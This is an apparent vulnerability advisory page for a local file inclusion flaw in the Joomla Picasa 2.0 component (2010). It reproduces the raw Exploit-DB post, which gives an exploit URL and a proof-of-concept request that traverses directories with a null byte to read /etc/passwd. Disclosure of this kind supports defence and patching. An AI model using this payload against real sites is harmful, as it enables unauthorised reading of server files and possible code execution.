Joomla Component Picasa 2.0 LFI Vulnerability

vendor:

Joomla Component Picasa

by:

Vrs-hCk

9,3

CVSS

HIGH

Local File Inclusion (LFI)

CWE

Product Name: Joomla Component Picasa

Affected Version From: 2.0

Affected Version To: 2.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:prof3ta:joomlapicasa2:2.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2010

Joomla Component Picasa 2.0 LFI Vulnerability

A Local File Inclusion (LFI) vulnerability exists in Joomla Component Picasa version 2.0. An attacker can exploit this vulnerability to include arbitrary files from the web server and execute arbitrary code. The vulnerability is due to insufficient sanitization of user-supplied input to the 'controller' parameter in the 'index.php' script. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. Successful exploitation of this vulnerability can result in arbitrary code execution.

Mitigation:

The vendor has released a patch to address this vulnerability. Users are advised to upgrade to the latest version of the software.

Source

Exploit-DB raw data:

# Exploit Title: Joomla Component Picasa 2.0 LFI Vulnerability
# Date: Monday, 05 April 2010
# Author: Vrs-hCk
# Software Link: http://prof3ta.netsons.org/
# Version: Joomla Component Picasa version 2.0
# Tested on:
# CVE :
# Code :

 ================================================================================================

 Title    : Joomla Component Picasa 2.0 LFI Vulnerability
 Software : com_joomlapicasa2 version 2.0
 Vendor   : http://prof3ta.netsons.org/

 Date     : Monday, 05 April 2010 (Indonesia)
 Author   : Vrs-hCk
 Contact  : ander[at]antisecurity.org
 Blog     : http://c0li.blogspot.com/

 ================================================================================================

 [+] Exploit

     http://[site]/[path]/index.php?option=com_joomlapicasa2&controller=[LFI]

 [+] PoC

     http://localhost/index.php?option=com_joomlapicasa2&controller=../../../../../etc/passwd%00

 ================================================================================================

 Greetz   :

     www.MainHack.net - www.ServerIsDown.org - www.AntiSecurity.org
     Paman, NoGe, OoN_Boy, pizzyroot, zxvf, matthews, Genex, s4va, stardustmemory,
     wishnusakti, bl4Ck_3n91n3, H312Y, S3T4N, xr00tb0y, str0ke, dkk.

 ================================================================================================

# c0li.m0de.0n